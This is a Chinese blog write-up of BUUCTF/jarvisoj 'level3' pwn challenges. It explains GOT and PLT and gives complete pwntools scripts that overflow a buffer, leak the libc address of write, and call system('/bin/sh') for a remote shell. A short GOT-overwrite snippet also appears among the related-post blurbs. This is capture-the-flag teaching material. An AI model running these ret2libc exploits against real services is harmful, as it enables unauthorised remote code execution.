buuctf pwn wp(第五波)认识GOT表和PLT

最新推荐文章于 2022-06-23 08:29:48 发布
最新推荐文章于 2022-06-23 08:29:48 发布
阅读量560 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847969/article/details/104990773
版权

基础知识(做题之前先看看这个):

https://blog.csdn.net/weixin_43847969/article/details/104921964

首先,我们可以将PLT表理解为一辆列车,GOT表示终点站,我们通过PLT表这辆列车,就可以到达GOT表,如果我们通过某种手段修改了这辆列车的目的地,那我们就可以到我们想要去的GOT表中的位置
大致步骤如下,
确定函数A在GOT表中的地址,以及函数B在内存中的地址,将函数B的地址写入函数A在GOT中的地址
(例如知道wirte函数的地址,将其修改为system)

我们首先看看最简单的例子
在这里插入图片描述
查找后没有发现system和/bin/sh
在这里插入图片描述
于是我们就要通过程序内部加载的libc库来解决,并且同时利用刚才学到的GOT表和PLT表的知识,来达到我们的目的:把write函数指向的地址修改为system
其中的要点如下,PLT表执行后会

解题思路大致如下,我们利用write函数的漏洞,使其产生溢出,然后再溢出部分中写入write函数在plt表中的地址和write函数的返回地址,这样got表上就会出现write函数的地址,然后我们读取接受这个got表上的wirte函数的地址,然后我们要找到system的地址,同样利用libc库中的system即可(但是要注意存在所谓的偏移,这个偏移我们可以利用相同版本中各个函数存放的地址间隔相同的特点,利用的write在got表上的位置以及libc中的write的地址相减,我们就可以得出这个偏移)然后将偏移与libc中的system相加,就能得出在got表中的system的位置,同理也能得到/bin/sh位置
(write函数在got表上的地址需要plt表先行解析,并将地址存入GOT表,所以我们要先调用一次plt表上的write)



from pwn import *				#首先引入pwn库
p=remote('111.198.29.45' ,'37701')				#设定目标地址
elf=ELF('./level3')								#设定elf文件
libc=ELF('./libc_32.so.6')		

write_plt=elf.plt['write']								
write_got=elf.got['write']						#对应第一步,确认被替代的函数A(write)在got表和plt表中的位置,然后赋值
main_addr = elf.symbols['main']			#这里还要找到write函数的返回地址(write函数的返回地址正是main函数)

payload='a'*0x8C+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)		
#这里通过溢出使程序指向write在plt上的地址,让plt上的write被执行一次,然后依次传入write函数的三个参数p32(1)+p32(write_got)+p32(4),下面有解析,总之这样让我们从wirte的got表上读取了四位内存信息
#按照函数-》返回地址-》参数1-》参数2-》参数3这样顺序的原因以前的文章讲过,参数最后返回)
p.sendlineafter('Input:\n', payload)
write_addr=u32(p.recv())		#上面接收了,这里赋值给write_got_add中的地址							

libc_base=write_addr-libc.symbols['write']							#通过两者相减,计算libc与实际在got表中的差值,以此计算system与libc的差值
print  'libc_base is' ,libc_base

sys_addr = libc_base + libc.symbols['system']
bin_addr =libc_base+libc.search('/bin/sh').next()               #查找函数用symbols,查找字符串用search().next()下面有图

payload='A' * 0x8C+p32(sys_addr)+'AAAA'+p32(bin_addr)			#再次发送payload	AAAA覆盖返回地址
p.sendline(payload)
p.interactive()
	
p.close()

然后这一题其实相当类似,也就是几个参数变了一下

jarvisoj_level3

在这里插入图片描述

from pwn import *
conn=remote("node3.buuoj.cn","28545")
e=ELF("level3")
libc=ELF("libc-2.19.so")
write_addr=e.symbols['write']
vul_addr=e.symbols['vulnerable_function']
got_addr=e.got['write']

conn.recvuntil("Input:\n")
payload1="a"*0x88+"bbbb"+p32(write_addr)+p32(vul_addr)+p32(1)+p32(got_addr)+p32(4)
conn.send(payload1)
temp = conn.recv(4)
true_address = u32(temp[0:4])
print hex(true_address)

offset=true_address-libc.symbols['write']

bin_addr=libc.search("/bin/sh").next()+offset
sys_addr=libc.symbols['system']+offset

payload2="a"*0x88+"bbbb"+p32(sys_addr)+"junk"+p32(bin_addr)
conn.send(payload2)
conn.interactive()

https://blog.csdn.net/qq_40148538/article/details/102021844
https://blog.csdn.net/weixin_41617275/article/details/84796987

月阴荒
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN gotplt
weixin_43225801的博客
12-03 1812
为了更好的用户体验和内存CPUCPU的利用率,程序编译时会采用两种进行辅助,一个为PLTPLT,一个为GOTGOTPLTPLT可以称为内部函数GOTGOT为全局函数PLTPLT中的每一项的数据内容都是对应的GOTGOT中一项的地址这个是固定不变的,到这里大家也知道了PLTPLT中的数据根本不是函数的真实地址,而是GOTGOT项的地址。 ...
PWN学习】GOT & PLT
Morphy_Amo的博客
12-09 1301
GOTPLT是什么?是怎样工作的?
PLT/GOT在ctf pwn题目中的理解与运用 结合CSAPPchap7
weixin_46521144的博客
04-01 1305
由于之前没学过CSAPP第七章的时候,做pwn题时许多概念比如PLTGOT,.BSS段这些概念都不很清楚,按照学长的方法照猫画虎也算是能做出来。如今学习的时候是带着当时的问题学完了这一章。因此做一个小总结,主要是对本章和pwn中关联度较大的部分做一个说明。 网上讲到和GOThijack相关的题目时,大多是推荐阅读CSAPP和连接相关的章节。如果你翻到了这篇文章,那你也就不用再学习原著了 ????当然,如果像更深入的了解,还是推荐CSAPP的。因为毕竟不能面面俱到,并且或许也会有理解错的地方。 理解
linux二进制中的GOTPLT
kynehc
10-02 619
GOTPLT 这篇为译文, 将大佬的好文章分享 GOT and PLT for pwning 最近在打0ctf时, 我的队友问我关于RELRO、GOTPLT以及所有ELF section的问题, 我意识到我只知道大概的概念, 而没有打破沙锅搞到底, 所以希望搞这篇文章来研究研究, 也同时能够有益路过人. 所有的例子都是在x86的linux平台上, 但是理念都是同等符合x86-64的, ( 我猜, 其他架构的linux, 关于ELF linking和glibc的应该都是一样, 但是我没求证) 高级介绍 下
PLTGOT
qq_40026795的博客
06-25 412
最近做pwn的题目,遇到了PLTGOT的问题,查阅了很多资料,最后有了自己的一点理解,记录下来以便以后的学习,以下为调用libc动态库的情况。以下内容均为个人理解,欢迎大佬批评指正。 主要参考网址:CTF|pwn栈溢出入门题level3解题思路及个人总结 GOT GLOBAL_OFFSET_TABLE:全局偏移量 主要分为头部,前两项和之后的项 头部即GOT[0],包含.dynam...
[OGeek2019]babyrop | BUUCTF | gotplt
Dem1的博客
04-27 83
一、解题 1. sub_80486BB 没用,省略 fd=随机数 read(fd,&buf,4u);->buf 0x14 4 ->sub_804871F(buf) ->sub_80487D0(v2) 2. sub_804871F sprintf() v1=strlen(buf) -> 这里可以用\x00截断
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWM.zip_51pwm控制LED_51控制pwn_PWN_pwm中断_pwn呼吸灯设计
09-14
基于51单片机,利用中断产生的PWN控制led灯亮度的C语言源代码,适合初学者学习和使用。
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
PLTGOT学习
至臻求学,胸怀云月
02-01 573
GOTPLT在程序中的作用非常巨大,接下来的讲解希望大家可以仔细看看 我们用一个非常简单的例子来讲解,代码如下:图1 然后我们编译 我们直接 gdb./a.out 来进行反编译处理,然后通过disas main查看main函数中的反编译代码如下: 图3 我们可以观察到 gets@plt 和 puts@plt 这两个函数,为什么后面加了个 @plt ,因为这个为 PLT ...
GOTPLT知识详解
热门推荐
qq_18661257的专栏
01-23 3万+
GOTGOTPLTPLT在程序中的作用非常巨大,接下来的讲解希望大家可以仔细看看我们用一个非常简单的例子来讲解,代码如下: 图1然后我们编译我们直接gdb./a.outgdb ./a.out来进行反编译处理,然后通过disasmaindisas main查看mainmain函数中的反编译代码如下:图3我们可以观察到gets@pltgets@plt和puts@pltputs@plt这两个函数,
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got
mcmuyanga的博客
03-18 455
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
CTF—Go题目复现
Sentiment的博客
06-23 2865
一道Go的模板注入由于没了解过Go的SSTI所以先简单看下:go语言快速入门:template模板 · Golang语言社区 · 看云 (kancloud.cn)Go SSTI初探 | tyskillのBloggo的SSTI漏洞成因与模板语法和jinja2差不多,都用到了,通过{{.}}我们可以获得到作用域Demo 当使用{{.}}时,会获取person结构体中的所有属性,所以在经过Execute渲染后,便会输出: 除此外若想获取单个属性也可以用 结果 复现 主要有几个路由 先看的flagHandler 中
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got
半岛铁盒的博客
04-05 401
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
BUUCTF-PWN刷题记录-19
weixin_44145820的博客
05-09 456
目录wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
Dark CTF 2020-Rev/HelloWorld-writeup
y4ung
10-07 1021
1. 介绍 本题是dark ctf Reverse的第二题:HelloWorld,网址:https://ctf.darkarmy.xyz/challs 题目描述:taking small Bites of Bytes 2. 分析 $ file hw hw: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically lin
Pwn 学习 pltgot
MrTreebook的博客
04-24 707
目录1.简介pltgotpltGOT2.保护机制3.执行顺序 1.简介pltgot plt PLT : 程序链接PLT,Procedure Link Table) GOT GOT : 全局偏移GOT, Global Offset Table) 此处不对概念做解释了 可以点击查看大佬的介绍 在此我以初学者的角度认识pltgot 点击跳转 点击跳转 2.保护机制 开启RELRO 在前面描述的漏洞攻击中曾多次引入了GOT覆盖方法,GOT覆盖之所以能成功是因为默认编译的应用程序的重定
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值